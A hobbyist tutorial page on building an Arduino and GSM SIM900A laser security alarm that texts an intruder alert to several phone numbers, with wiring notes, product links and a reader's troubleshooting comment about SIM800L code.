By default the environment will be added using the PackageLoader Jinja2 loader but you can explicitly set which loader you want to use:
from jinja2 import FileSystemLoaderfrom masonite.view import View...wsgi = False...def boot(self, view: View):view.add_environment('dashboard/templates', loader=FileSystemLoader)
The default loader of
PackageLoader will work for most cases but if it doesn't work for your use case, you may need to change the Jinja2 loader type.
If using a
/ doesn't seem as clean to you, you can also optionally use dots:
def show(self, view: View):view.render('dashboard.user.show')
if you want to use a global view you still need to use the first
/:
def show(self, view: View):view.render('/dashboard.user.show')
There are quite a few built in helpers in your views. Here is an extensive list of all view helpers:
You can get the request class:
<p> Path: {{ request().path }} </p>
You can get the location of static assets:
If you have a configuration file like this:
config/storage.py....'s3': {'s3_client': 'sIS8shn...'...'location': ''},....
...<img src="{{ static('s3', 'profile.jpg') }}" alt="profile">...
this will render:
<img src="" alt="profile">
You can create a CSRF token hidden field to be used with forms:
<form action="/some/url" method="POST">{{ csrf_field }}<input ..></form>
You can get only the token that generates. This is useful for JS frontends where you need to pass a CSRF token to the backend for an AJAX call
<p> Token: {{ csrf_token }} </p>
You can also get the current authenticated user. This is the same as doing
request.user().
<p> User: {{ auth().email }} </p>
On forms you can typically only have either a GET or a POST because of the nature of html. With Masonite you can use a helper to submit forms with PUT or DELETE
<form action="/some/url" method="POST">{{ request_method('PUT') }}<input ..></form>
This will now submit this form as a PUT request.
You can get a route by it's name by using this method:
<form action="{{ route('route.name') }}" method="POST">..</form>
If your route contains variables you need to pass then you can supply a dictionary as the second argument.
<form action="{{ route('route.name', {'id': 1}) }}" method="POST">..</form>
or a list:
<form action="{{ route('route.name', [1]) }}" method="POST">..</form>
Another cool feature is that if the current route already contains the correct dictionary then you do not have to pass a second parameter. For example if you have a 2 routes like:
Get('/dashboard/@id', '[email protected]').name('dashboard.show'),Get('/dashhboard/@id/users', '[email protected]').name('dashhboard.users')
If you are accessing these 2 routes then the @id parameter will be stored on the user object. So instead of doing this:
<form action="{{ route('dashboard.users', {'id': 1}) }}" method="POST">..</form>
You can just leave it out completely since the
id key is already stored on the request object:
<form action="{{ route('dashboard.users') }}" method="POST">..</form>
This is useful for redirecting back to the previous page. If you supply this helper then the request.back() method will go to this endpoint. It's typically good to use this to go back to a page after a form is submitted with errors:
<form action="/some/url" method="POST">{{ back(request().path) }}</form>
Now when a form is submitted and you want to send the user back then in your controller you just have to do:
def show(self, request: Request):# Some failed validationreturn request.back()
The
request.back() method will also flash the current inputs to the session so you can get them when you land back on your template. You can get these values by using the
old() method:
<form><input type="text" name="email" value="{{ old('email') }}">...</form>
You can access the session here:
<p> Error: {{ session().get('error') }} </p>
You can sign things using your secret token:
<p> Signed: {{ sign('token') }} </p>
You can also unsign already signed string:
<p> Signed: {{ unsign('signed_token') }} </p>
This is just an alias for sign
This is just an alias for unsign
This allows you to easily fetch configuration values in your templates:
<h2> App Name: {{ config('application.name') }}</h2>
Allows you to fetch values from objects that may or may not be None. Instead of doing something like:
{% if auth() and auth().name == 'Joe' %}<p>Hello!</p>{% endif %}
You can use this helper:
{% if optional(auth()).name == 'Joe' %}<p>Hello!</p>{% endif %}
This is the normal dd helper you use in your controllers
You can use this helper to quickly add a hidden field
<form action="/" method="POST">{{ hidden('secret' name='secret-value') }}</form>
Check if a template exists
{% if exists('auth/base') %}{% extends 'auth/base.html' %}{% else %}{% extends 'base.html' %}{% endif %}
Gets a cookie:
<h2> Token: {{ cookie('token') }}</h2>
Get the URL to a location:
<form action="{{ url('/about', full=True) }}" method="POST"></form>
Below are some examples of the Jinja2 syntax which Masonite uses to build views.
It's important to note that Jinja2 statements can be rewritten with line statements and line statements are preferred in Masonite. In comparison to Jinja2 line statements evaluate the whole line, thus the name line statement.
So Jinja2 syntax looks like this:
{% if expression %}<p>do something</p>{% endif %}
This can be rewritten like this with line statement syntax:
@if expression<p>do something</p>@endif
It's important to note though that these are line statements. Meaning nothing else can be on the line when doing these. For example you CANNOT do this:
<form action="@if expression: 'something' @endif"></form>
But you could achieve that with the regular formatting:
<form action="{% if expression %} 'something' {% endif %}"></form>
Whichever syntax you choose is up to you.
You can show variable text by using
{{ }} characters:
<p>{{ variable }}</p><p>{{ 'hello world' }}</p>
If statements are similar to python but require an endif!
Line Statements:
@if expression<p>do something</p>@elif expression<p>do something else</p>@else<p>above all are false</p>@endif
Using alternative Jinja2 syntax:
{% if expression %}<p>do something</p>{% elif %}<p>do something else</p>{% else %}<p>above all are false</p>{% endif %}
For loop look similar to the regular python syntax.
Line Statements:
@for item in items<p>{{ item }}</p>@endfor
Using alternative Jinja2 syntax:
{% for item in items %}<p>{{ item }}</p>{% endfor %}
An include statement is useful for including other templates.
Line Statements:
@include 'components/errors.html'<form action="/"></form>
Using alternative Jinja2 syntax:
{% include 'components/errors.html' %}<form action="/"></form>
Any place you have repeating code you can break out and put it into an include template. These templates will have access to all variables in the current template.
This is useful for having a child template extend a parent template. There can only be 1 extends per template:
Line Statements:
@extends 'components/base.html'@block content<p> read below to find out what a block is </p>@endblock
Using alternative Jinja2 syntax:
{% extends 'components/base.html' %}{% block content %}<p> read below to find out what a block is </p>{% endblock %}
Blocks are sections of code that can be used as placeholders for a parent template. These are only useful when used with the
extends above. The "base.html" template is the parent template and contains blocks, which are defined in the child template "blocks.html".
Line Statements:
<!--
Using alternative Jinja2 syntax:
<!-- %}
As you see blocks are fundamental and can be defined with Jinja2 and line statements. It allows you to structure your templates and have less repeating code.
The blocks defined in the child template will be passed to the parent template. | https://docs.masoniteproject.com/the-basics/views | CC-MAIN-2020-34 | refinedweb | 2,053 | 56.96 |
.
Implement timers in Windows Phone
This article explains how to implement a timer (DispatcherTimer) in Windows Phone.
Windows Phone 8
Windows Phone 7.5
Introduction
The code example shows how to use DispatcherTimer on Windows Phone. Timers are very useful for executing code at specified time intervals.
Implementation
The code in this article is written using C#. A text box will be used to display a clock, which is refreshed every second. Follow the below steps to create the clock app:
- Create a new "Silverlight" project using C# language. Here we are naming the project as "Clock"
- Place a text box and a button.
- We are giving textbox name as "txtClock". We can also change the font and color of content in the text box.
- We will now add following code to the project.
using System;
using Microsoft.Phone.Controls;
using System.Windows.Threading;
namespace Clock
{
public partial class MainPage : PhoneApplicationPage
{
// Constructor
public MainPage()
{
InitializeComponent();
}
void OnTimerTick(Object sender, EventArgs args)
{
// text box property is set to current system date.
// ToString() converts the datetime value into text
txtClock.Text = DateTime.Now.ToString();
}
private void button1_Click(object sender, EventArgs e)
{
// creating timer instance
DispatcherTimer newTimer = new DispatcherTimer();
// timer interval specified as 1 second
newTimer.Interval = TimeSpan.FromSeconds(1);
// Sub-routine OnTimerTick will be called at every 1 second
newTimer.Tick += OnTimerTick;
// starting the timer
newTimer.Start();
}
}
}
Building and Running
The application is now ready to be built (Ctrl+Shift+B) and ran (Ctrl+F5) either on the emulator or a device.
Note
This application has been tested on the emulator, and should work on a physical device.) | http://developer.nokia.com/community/wiki/Implement_timers_in_Windows_Phone | CC-MAIN-2014-42 | refinedweb | 266 | 58.89 |
Finally, JDK 12 which is a part of the six-month release cycle, is here. It comes after the last Java LTS version 11. We had discussed at length on Java 11 features before. Today we’ll be discussing Java 12 features and see what it has in store for developers.
Java 12 was launched on March 19, 2019. It is a Non-LTS version. Hence it won’t have long term support.
Table of Contents
- 1 Java 12 Features
- 2 JVM Changes
- 3 Language Changes And Features
Java 12 Features
Some of the important Java 12 features are;
- JVM Changes – JEP 189, JEP 346, JEP 344, and JEP 230.
- Switch Expressions
- File mismatch() Method
- Compact Number Formatting
- Teeing Collectors in Stream API
- Java Strings New Methods – indent(), transform(), describeConstable(), and resolveConstantDesc().
- JEP 334: JVM Constants API
- JEP 305: Pattern Matching for instanceof
- Raw String Literals is Removed From JDK 12.
Let’s look into all these Java 12 features one by one.
JVM Changes
1. JEP 189 – Shenandoah: A Low-Pause-Time Garbage Collector (Experimental)
RedHat initiated Shenandoah Garbage Collector to reduce GC pause times. The idea is to run GC concurrently with the running Java threads.
It aims at consistent and predictable short pauses irrelevant of the heap size. So it does not matter if the heap size is 15 MB or 15GB.
It is an experimental feature in Java 12.
2. JEP 346 – Promptly Return Unused Committed Memory from G1
Stating Java 12, G1 will now check Java Heap memory during inactivity of application and return it to the operating system. This is a preemptive measure to conserve and use free memory.
3. JEP 344 : Abortable Mixed Collections for G1.
4. JEP 230 and 344
Microbenchmark Suite, JEP 230 feature adds a basic suite of microbenchmarks to the JDK source code. This makes it easy for developers to run existing microbenchmarks and create new ones.
One AArch64 Port, Not Two, JEP 344, removes all of the sources related to the arm64 port while retaining the 32-bit ARM port and the 64-bit aarch64 port. This allows contributors to focus their efforts on a single 64-bit ARM implementation
5. JEP 341 Default CDS Archives
This enhances the JDK build process to generate a class data-sharing (CDS) archive, using the default class list, on 64-bit platforms. The goal is to improve startup time. From Java 12, CDS is by default ON.
To run your program with CDS turned off do the following:
java -Xshare:off HelloWorld.java
Now, this would delay the startup time of the program.
Language Changes And Features
Java 12 has introduced many language features. Let us look at a few with implementations.
1. Switch Expressions (Preview)
Java 12 has enhanced Switch expressions for Pattern matching.
Introduced in JEP 325, as a preview language feature, the new Syntax is
L ->.
Following are some things to note about Switch Expressions:
- The new Syntax removes the need for break statement to prevent fallthroughs.
- Switch Expressions don’t fall through anymore.
- Furthermore, we can define multiple constants in the same label.
- The default case is now compulsory in Switch Expressions.
- break is used in Switch Expressions to return a value from a case itself.
Classic switch statement:
String result = "";
switch (day) {
    case "M":
    case "W":
    case "F": {
        result = "MWF";
        break;
    }
    case "T":
    case "TH":
    case "S": {
        result = "TTS";
        break;
    }
};
System.out.println("Old Switch Result:");
System.out.println(result);
With the new Switch expression, we don’t need to set break everywhere thus prevent logic errors!
String result = switch (day) {
    case "M", "W", "F" -> "MWF";
    case "T", "TH", "S" -> "TTS";
    default -> {
        if (day.isEmpty())
            break "Please insert a valid day.";
        else
            break "Looks like a Sunday.";
    }
};
System.out.println(result);
Let’s run the below program containing the new Switch Expression using JDK 12.
public class SwitchExpressions {
    public static void main(String[] args) {
        System.out.println("New Switch Expression result:");
        executeNewSwitchExpression("M");
        executeNewSwitchExpression("TH");
        executeNewSwitchExpression("");
        executeNewSwitchExpression("SUN");
    }

    public static void executeNewSwitchExpression(String day) {
        String result = switch (day) {
            case "M", "W", "F" -> "MWF";
            case "T", "TH", "S" -> "TTS";
            default -> {
                if (day.isEmpty())
                    break "Please insert a valid day.";
                else
                    break "Looks like a Sunday.";
            }
        };
        System.out.println(result);
    }
}
Since this is a preview feature, please ensure that you have selected the Language Level as Java 12 preview.
To compile the above code run the following command:
javac -Xlint:preview --enable-preview -source 12 src/main/java/SwitchExpressions.java
After running the compiled program, we get the following in the console
Java Switch Expressions Program Output
2. File.mismatch method
Java 12 added the following method to compare two files:
public static long mismatch(Path path, Path path2) throws IOException
This method returns the position of the first mismatch or -1L if there is no mismatch.
Two files can have a mismatch in the following scenarios:
- If the bytes are not identical. In this case, the position of the first mismatching byte is returned.
- File sizes are not identical. In this case, the size of the smaller file is returned.
Example code snippet from IntelliJ Idea is given below:
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class FileMismatchExample {
    public static void main(String[] args) throws IOException {
        Path filePath1 = Files.createTempFile("file1", ".txt");
        Path filePath2 = Files.createTempFile("file2", ".txt");
        Files.writeString(filePath1, "JournalDev Test String");
        Files.writeString(filePath2, "JournalDev Test String");

        long mismatch = Files.mismatch(filePath1, filePath2);
        System.out.println("File Mismatch position... It returns -1 if there is no mismatch");
        System.out.println("Mismatch position in file1 and file2 is >>>>");
        System.out.println(mismatch);
        filePath1.toFile().deleteOnExit();
        filePath2.toFile().deleteOnExit();

        System.out.println();

        Path filePath3 = Files.createTempFile("file3", ".txt");
        Path filePath4 = Files.createTempFile("file4", ".txt");
        Files.writeString(filePath3, "JournalDev Test String");
        Files.writeString(filePath4, "JournalDev.com Test String");

        long mismatch2 = Files.mismatch(filePath3, filePath4);
        System.out.println("Mismatch position in file3 and file4 is >>>>");
        System.out.println(mismatch2);
        filePath3.toFile().deleteOnExit();
        filePath4.toFile().deleteOnExit();
    }
}
The output when the above Java Program is compiled and run is:
Java File Mismatch Example Program Output
3. Compact Number Formatting
import java.text.NumberFormat;
import java.util.Locale;

public class CompactNumberFormatting {
    public static void main(String[] args) {
        System.out.println("Compact Formatting is:");

        NumberFormat upvotes = NumberFormat
                .getCompactNumberInstance(new Locale("en", "US"), NumberFormat.Style.SHORT);
        upvotes.setMaximumFractionDigits(1);
        System.out.println(upvotes.format(2592) + " upvotes");

        NumberFormat upvotes2 = NumberFormat
                .getCompactNumberInstance(new Locale("en", "US"), NumberFormat.Style.LONG);
        upvotes2.setMaximumFractionDigits(2);
        System.out.println(upvotes2.format(2011) + " upvotes");
    }
}
Java Compact Number Formatting Program Output
4. Teeing Collectors
Teeing Collector is the new collector utility introduced in the Streams API.
This collector has three arguments – Two collectors and a Bi-function.
All input values are passed to each collector and the result is available in the Bi-function.
double mean = Stream.of(1, 2, 3, 4, 5)
    .collect(Collectors.teeing(
        summingDouble(i -> i),
        counting(),
        (sum, n) -> sum / n));
System.out.println(mean);
The output is 3.0.
5. Java Strings New Methods
4 new methods have been introduced in Java 12 which are:
- indent(int n)
- <R> R transform(Function<? super String, ? extends R> f)
- Optional<String> describeConstable()
- String resolveConstantDesc(MethodHandles.Lookup lookup)
To learn about the above methods and their implementation in detail, refer to our Java 12 String Methods tutorial.
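As a quick illustration of the first two methods, here is a minimal sketch (not part of the original article; it requires JDK 12 or newer):

```java
public class StringMethodsDemo {
    public static void main(String[] args) {
        // indent(n) prefixes each line with n spaces and normalizes
        // the line ending, appending '\n' if it is missing.
        String indented = "hello".indent(4);
        System.out.println("[" + indented + "]"); // four spaces, "hello", then a newline

        // transform(f) applies an arbitrary function to the string.
        int length = "JournalDev".transform(String::length);
        System.out.println(length); // 10
    }
}
```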
6. JEP 334: JVM Constants API
A new package, java.lang.constant, is introduced with this JEP. It is not that useful for developers who do not work with the constant pool.
7. JEP 305: Pattern Matching for instanceof (Preview)
Another Preview Language feature!
The old way to typecast a type to another type is:
if (obj instanceof String) {
    String s = (String) obj;
    // use s in your code from here
}
The new way is :
if (obj instanceof String s) {
    // can use s directly here
}
This saves us some unnecessary typecasting.
That brings an end to this article on Java 12 features.
Is pattern matching for instance of part of Java12 and not 14?
Excellent…! Good work, as always. And appreciate you getting this to us so quickly and precisely.
Thank you, I really like your article!
very nice Thanks
Nice and precise!
Thanks | https://www.journaldev.com/28666/java-12-features | CC-MAIN-2021-04 | refinedweb | 1,352 | 51.34 |
In Windows Server 2003, you can change domain names, here's a link
here's another link for Domains in Active Directory. It's in 2 parts but give all the information on forest/tree domain organization and DNS namespace [as AD requires DNS to function].
I should have added more info about the problem. Unfortunately these are Windows 2000 domains. Our new one will be Win 2003.
Since the NETBIOS name for the xyzcorp.local domain is "xyzcorp", this could cause problems when adding a new domain, right? Even if I create the new domain xyzcorp.business.com with a different NETBIOS name (i.e. NOT xyzcorp), could the new domain (xyzcorp.business.com) and the old domains co-exist on the same subnet without name conflicts?
Adding forest root domain after-the-fact
Old domains:
root.xyzcorp.business.com
xyzcorp.local
New desired domain:
xyzcorp.business.com
As we would like to do this in stages, can a new forest root domain (which would be the parent of the subdomain "root.xyzcorp.business.com") be added? If so, how would this best be approached?
This is the mail archive of the gdb-patches@sourceware.org mailing list for the GDB project.
>>>>> "Doug" == Doug Evans <dje@google.com> writes:

Doug> This patch is a first pass at supporting the Go language.
Doug> There's still lots to do, but this is a start.

Nice work.

Doug> I have a few things I'd like to clean up before checking in
Doug> but I don't plan on removing all FIXMEs.
Doug> And I still need to document Go specific features.

A few notes below.

Doug> +/* Go objects should be embedded in a DW_TAG_module DIE,
Doug> +   and it's not clear if/how imported objects will appear.
Doug> +   To keep Go support simple until that's worked out,
Doug> +   go back through what we've read and create something usable.
Doug> +   We could do this while processing each DIE, and feels kinda cleaner,
Doug> +   but that way is more invasive.
Doug> +   This is to, for example, allow the user to type "p var" or "b main"
Doug> +   without having to specify the package name, and allow lookups
Doug> +   of module.object to work in contexts that use the expression
Doug> +   parser. */

I think this over-exposes some buildsym details to dwarf2read.
How much more invasive is the alternative?

Doug> +   And if not, it should be clearly documented why not.
Doug> +   OTOH, why are we demangling at all here?
Doug> +   new_symbol_full assumes we return the mangled name.
Doug> +   I realize things are changing in this area, I just forget how. */
Doug> +  if (cu->language == language_go)
Doug> +    {
Doug> +#if 0
Doug> +      demangled = cu->language_defn->la_demangle (mangled, 0);
Doug> +#else
Doug> +      /* This is a lie, but we already lie to the caller new_symbol_full.
Doug> +         This just undoes that lie until things are cleaned up.  */
Doug> +      demangled = NULL;
Doug> +#endif

I've CC'd Keith to see if he can clear this up.

Doug> +/* FIXME: IWBN to use c-exp.y's parse_number if we could.  */

You could export it as c_parse_number or something like that, I suppose.

Doug> +   FIXME: Hacky, but until things solidify it's not worth much more.  */

I think you could safely remove this FIXME.
Doug> +  /*{"->", RIGHT_ARROW, BINOP_END}, Doesn't exist in Go. */
Doug> +#if 0 /* -> doesn't exist in Go. */
Doug> +      if (in_parse_field && tokentab2[i].token == RIGHT_ARROW)
Doug> +        last_was_structop = 1;
Doug> +#endif

I think you could zap this dead code.

Doug> +  /* TODO(dje): The encapsulation of what a pointer is belongs in value.c.
Doug> +     I.e. If there's going to be unpack_pointer, there should be
Doug> +     unpack_value_field_as_pointer.  Do this until we can get
Doug> +     unpack_value_field_as_pointer.  */
Doug> +  LONGEST addr;

Eventually I want us to get rid of val_print entirely and only have
value_print.  Then this won't be a problem; since you will just use the
value API to access fields.

Doug> +  /* TODO(dje): Perhaps we should pass "UTF8" for ENCODING.
Doug> +     The target encoding is a global switch.
Doug> +     Either choice is problematic.  */
Doug> +  i = val_print_string (elt_type, NULL, addr, length, stream, options);

What is the problem here?

Tom
IWS (Instructional Work Servers). There are 4 instructional Unix servers: ceylon, fiji, sumatra, and tahiti.
Accessing the servers:
Terminal Programs:
- telnet (insecure; cannot be used)
- ssh (via the TeraTerm or Putty programs)
[prompt]$ <command> <flags> <args>
fiji:/u15/awong$ ls -l -a unix-tutorial
Command
(Optional) arguments
Command Prompt
(Optional) flags
Note: In Unix, you’re expected to know what you’re doing. Many
commands will print a message only if something went wrong.
fiji:/u15/awong$ man -k password
passwd (5) - password file
xlock (1) - Locks the local X display until a password is entered
fiji:/u15/awong$ passwd
~ Your home directory
.. The parent directory
. The current directory
Note: Both of these commands will over-write existing files without warning you!
* Zero or more characters
? Exactly one character
Note: It is a good programming practice to use cerr instead of cout for error messages.
This tutorial provided by UW ACM to hctang@cs, zanfur@cs
fiji:ehsu% g++ -Wall -ansi -g -o hello hello.cpp
fiji:ehsu% ./hello
You saw this in 143!
These are the discrete steps to program “compilation”
Hitting the ‘!’ button in MSVC or typing a “g++ *.cpp” to build (not “compile”) your program hides all these separate steps.
Question: would you want to do this entire process (ie, pre-process and compile every file) every time you wanted to generate a new executable?“Compilation” or “The Big Lie”
[Diagram: .h and .cpp files pass through the pre-processor and compiler to produce object files; the linker then combines the object files with the ANSI library and other libraries to produce the .exe file.]
<target>: <requirements>
<command>
<variable>=<string value>
# Example Makefile
CXX=g++
CXXOPTS=-g -Wall -ansi -DDEBUG
foobar: foo.o bar.o
	$(CXX) $(CXXOPTS) -o foobar foo.o bar.o
foo.o: foo.cc foo.hh
	$(CXX) $(CXXOPTS) -c foo.cc
bar.o: bar.cc bar.hh
	$(CXX) $(CXXOPTS) -c bar.cc
clean:
rm -f foo.o bar.o foobar
These template slides are freely stolen from Albert Wong (awong@cs)
Will this code compile?
/* Array.hh */
#ifndef ARRAY_HH
#define ARRAY_HH
template <typename T>
class Array {
Array( int i ) {
b = “Hello Mom!”;
}
};
#endif /* ARRAY_HH */
Will this program link?
The link error happens at a.GetCapacity().
Thus the definition of Array<int>::GetCapacity() never gets instantiated and compiled to object code.
/* main.cc */
#include <iostream>
using namespace std;
#include "Array.hh"
int main(void) {
Array<int> a(10);
cout << a.GetCapacity() << endl;
return 0;
}
#include "Array.cc"
template class Array<int>;
template class Array<double>;
This line forces the instantiation of the Array class template (and all its member functions) for ints.
C++ Templates - The Safe Way
g++ -Wall -ansi main.cc ArrayInst.cc | https://www.slideserve.com/ania/iws-instructional-work-servers | CC-MAIN-2018-17 | refinedweb | 436 | 59.09 |
20 January 2012 16:24 [Source: ICIS news]
WASHINGTON (ICIS)--
In its monthly report, NAR said December saw sales of 4.61m residential units, on a seasonally adjusted annual basis, and followed November’s downwardly revised 4.39m home sales, which were 1% better than October.
Last month’s sales of existing single-family homes, condominiums and co-ops also marked a 3.6% improvement over the December 2010 level.
“The pattern of home sales in recent months demonstrates a market in recovery,” said Lawrence Yun, NAR chief economist. “Record low mortgage interest rates, job growth and bargain home prices are giving more consumers the confidence they need to enter the market."
For full year 2011, he said existing home sales rose 1.7% to 4.26m units sold from the 4.19m home sales recorded for 2010.
Association president Moe Veissi predicted the buying trend would continue through 2012.
“We have a large pent-up demand, and household formation is likely to return to normal as the job market steadily improves,” he said.
Household formations occur when young people leave their parents’ home to either rent an apartment or buy a house. Economists estimate that the 2008-2009 recession forced delay of as many as 2m household formations.
“More buyers coming into the market means additional benefits for the overall economy,” Veissi said, “and when people buy homes, they stimulate a lot of related goods and services.”
The housing market is a key downstream consuming sector for a wide variety of chemicals, resins and derivative products.
While new home construction is the principal consuming engine for chemicals in the housing sector, the state of the existing homes sector is important because those sales take older residences off the market and help generate demand for new construction.
NAR said the inventory of existing homes available for sale fell by 9.2% in December from November to 2.38m units, which represents a 6.2-month supply at current sales rates. That figure is nearing a more normal inventory level, which in a non-recession market typically would be a four- to six-month supply.
The 2.38m existing homes for sale are down considerably from the record of just over 4m units on the market in July | http://www.icis.com/Articles/2012/01/20/9525797/us-existing-home-sales-jump-5-in-dec-seen-as-sign-of-recovery.html | CC-MAIN-2014-52 | refinedweb | 379 | 56.96 |
Details
Description:
 * <b>NOTE:</b> some settings may be changed on the
 * returned {@link IndexWriterConfig}, and will take
 * effect in the current IndexWriter instance.  See the
 * javadocs for the specific setters in {@link
 * IndexWriterConfig} for details.
idea?
Activity
I don't think we should add another Config object, making things complicated for such a very very expert use case.
Even ordinary users need to use IWC, and 99% of them don't care about changing things live.
I'm not proposing to complicate matters for 99.9% of the users. On the contrary – users will still do:
IndexWriterConfig config = new IndexWriterConfig(...); // configure it IndexWriter writer = new IndexWriter(dir, config);
Only the expert users who will want to change some settings "live", will do:
Config conf = writer.getConfig(); // NOTE: it's a different type conf.setSomething();
Config can be an IW internal type and most users won't even be aware of it. Today we document that the given IWC to IW ctor is cloned and it will remain as such. Only instead of being cloned to an IWC type, it will be cloned to a Config (or LiveConfig) type.
IWC documentation isn't changed, IW.getConfig changes by removing that NOTE, and if you care about "lively" configure IW, you can do so through LiveConfig. And we can test that type too !
Right, but i suppose changing live settings isnt necessarily the only use case for writer.getConfig() ?
Today someone can take the config off of there and set it on another writer (it will be privately cloned).
so i think if we want to do it this way, we could just keep getConfig as is, and add getLiveConfig which
actually returns the same object, just cast through that interface.
ok actually i was partially wrong, one can no longer actually use the IWC from a writer since its marked as "owned".
But they can still grab it and look at stuff like getIndexDeletionPolicy, even though thats not live.
I guess to be less confusing we should add getLiveConfig and just remove getConfig completely?
Today someone can take the config off of there and set it on another writer (it will be privately cloned)
True, but I'm not aware of such use, and still someone can cache the IWC himself and pass it to multiple writers?
If getConfig() returns an IWC which has setters(), that'll confuse the user for sure, because those settings won't take effect.
I prefer that getConfig return the new LiveConfig type, with few setters and all getters (i.e. all getXYZ from IWC), and let whoever want to pass the same IWC instance to other writers handle it himself.
Alternatively, we can add another ctor which takes a LiveConfig object, that is returned from getConfig(), but I prefer to avoid that until someone actually tells us that he shares the same IWC with other writers, and he cannot cache it himself?
sorry, instead of nuking getConfig make it pkg-private. Things like RandomIndexWriter want to peek into some
un-live settings (like codec), I think we should still be able to look at these things for tests
I guess to be less confusing we should add getLiveConfig and just remove getConfig completely?
Yes that's the proposal - either getConfig or getLiveConfig, but return a LiveConfig object with all the getters of IWC, and only the setters that we want to support.
True, but I'm not aware of such use, and still someone can cache the IWC himself and pass it to multiple writers?
I'm just talking about the general issue that IW.getConfig is not only used to change settings live.
Today our tests use this to peek at the settings on the IW (see my RandomIndexWriter example)...
Phew, that was tricky, but here's the end result – refactored IndexWriterConfig into the following class hierarchy:
- ReadOnlyConfig
  - AbstractLiveConfig
    - LiveConfig
    - IndexWriterConfig
- IndexWriter now takes ReadOnlyConfig, which is an abstract class with all abstract getters.
- LiveConfig is returned from IndexWriter.getConfig(), and is initialized with the ReadOnlyConfig given to IW. It overrides all getters to delegate the call to the given (cloned) config. It is public but with a package-private ctor.
- IndexWriterConfig is still the entry object for users to initialize an IndexWriter, and adds its own setters for the non-live settings.
- The AbstractLiveConfig in the middle is used for generics and keeping the builder pattern. That way, LiveConfig.set1() and IndexWriterConfig.set1() return the proper type (LiveConfig or IndexWriterConfig respectively).
I would have liked IW to keep getting IWC in its ctor, but there's one test that prevents it: TestIndexWriterConfig.testIWCInvalidReuse, which initializes an IW, call getConfig and passes it to another IW (which is invalid). I don't know why it's invalid, as IW clones the given IWC, but that is one reason why I had to factor the getters out to a shared ReadOnlyConfig.
ROC is not that bad though – it kind of protects against IW changing the given config ...
At least, no user code should change following these changes, except from changing the variable type used to cache IW.getConfig() to LiveConfig, which is what we want.
I had a brief chat about IWC.usedByIW with Mike (was introduced in
LUCENE-4084), and we both agree it's not needed anymore, as now with IW.getConfig() returning LiveConfig and IW taking IWC in its ctor, no one can pass the same instance returned from getConfig to a new IW, and so the relevant test can be nuked, together with that AtomicBoolean.
I'll nuke them then, and absorb ReadOnlyConfig into AbstractLiveConfig and stick with just two concrete clases: LiveConfig returned from IW.getConfig and IWC given to its ctor.
I'll post a patch probably tomorrow.
I think the class hierarchy/generics are too tricky.
Why do we need generics?
That's certified and suggested by the generics policeman. The generics are needed to make the builder API work correct (compare Enum<T extends Enum<T>>)
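The self-bounded generics idea mentioned here can be sketched outside of Lucene like this (the class and method names below are illustrative, not the actual Lucene API):

```java
// Self-bounded generics: each setter returns T, so chained calls on a
// subclass keep the subclass's static type (compare Enum<T extends Enum<T>>).
abstract class BaseConfig<T extends BaseConfig<T>> {
    int maxBufferedDocs;

    @SuppressWarnings("unchecked")
    T setMaxBufferedDocs(int n) {
        this.maxBufferedDocs = n;
        return (T) this; // safe as long as subclasses bind T to themselves
    }
}

final class WriterConfig extends BaseConfig<WriterConfig> {
    String openMode = "CREATE_OR_APPEND";

    WriterConfig setOpenMode(String mode) {
        this.openMode = mode;
        return this;
    }
}

public class SelfBoundedDemo {
    public static void main(String[] args) {
        // Chaining works in any order because setMaxBufferedDocs
        // already returns WriterConfig, not BaseConfig.
        WriterConfig c = new WriterConfig().setMaxBufferedDocs(100).setOpenMode("CREATE");
        System.out.println(c.maxBufferedDocs + " " + c.openMode); // 100 CREATE
    }
}
```

The generics never surface in calling code; they only exist so the shared setters can be written once in the base class.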
Its not certified by me. Its too confusing for a class everyone must use.
I dont care about the builder pattern, builder pattern simply isnt worth it for confusing generics on a config class.
If we remove IWC's chained setters (return void), can we simplify this?
We could, I am against, I love IndexWriterConfig!
I love it too, and the changes would be too horrible. We use this builder pattern everywhere. Remember, the changes in this issue are to not confuse people, that's it. They don't cause users to change their code almost at all.
I don't quite understand what's the issue with the generics. If you don't look at IWC / LC code, it's not visible at all. I mean, in your application code, you won't see any generics.
The generics is because I wanted to not duplicate code between LiveConfig and IWC, so that the live settings share the same setXYZ code. First I thought to write a separate LiveConfig class, but then the setter methods need to be duplicated. I'll take another look – perhaps IWC.setRAMBuffer for instance can just delegate to a private LiveConfig instance.setter. That will keep the APIs without generics, with perhaps so jdoc duplication ...
I can take a stab at something like that, or if you have another proposal. I don't want to let go of the builder pattern though.
I think the generics here are not very complicated and also not really user facing. its only a tool here to make things nice for the user I think that justifies it. so I think this looks good though.
I dislike chaining ("return this" from setters) since it's so easily and often abused. Here's an example from Lucene's tests:
IndexWriter w = new MockIndexWriter(dir, newIndexWriterConfig(
    TEST_VERSION_CURRENT, new MockAnalyzer(random()))
    .setOpenMode(OpenMode.CREATE)
    .setRAMBufferSizeMB(0.1)
    .setMaxBufferedDocs(maxBufferedDocs)
    .setIndexerThreadPool(new ThreadAffinityDocumentsWriterThreadPool(maxThreadStates))
    .setReaderPooling(doReaderPooling)
    .setMergePolicy(newLogMergePolicy()));
I don't quite understand what's the issue with the generics. If you don't look at IWC / LC code, it's not visible at all. I mean, in your application code, you won't see any generics.
It's also important to keep our non-user-facing sources simple too, so
our source code is approachable to new users.
Having 4 classes, plus generics, for what ought to be a simple
configuration class, is too much in my opinion. I'd rather stick with
javadocs explaining what can and cannot be changed live. This (wanting
to change live seettings) is expert usage...
Hopefully, we can simplify the approach here.
Patch removes ReadOnlyConfig and the tests from TestIWC that ensure that the same IWC instance isn't shared between IWs. This is no longer needed, since now IW takes IWC and returns LiveConfig, so it cannot be passed to another IW, simply because the compiler won't allow it.
This is a better solution IMO than maintaining an AtomicBoolean + tests that enforce that + RuntimeException that is known only during testing, or worse.
I don't think we should disable the Builder pattern - our tests use it, and I bet users use it too (my code does). If it bothers anyone, he can separately change all our tests to call the setters one per line.
The generics, as Simon said, are just a tool to save code duplication and make sure that IWC and LC have the same getter signatures, and share the live setters.
The fact is, no user code will change by that change, and really, no Lucene developer should be affected by it either – this is just a configuration class, adding set/get methods to it will be as easy as they were before. But now compile-wise, we don't let even expert users change non-live settings.
If there are no objections, I'd like to commit this by tomorrow.
I still feel the same way as before. I'm sorry you don't agree with me, but please don't shove the change in.
Please don't rush this Shai.
I still don't like the added complexity of the current patch. I do
think compile-time checking of live configuration would be neat/nice to
have (for expert users) but not at the cost of the added complexity
(abstract classes, generics) of the current patch.
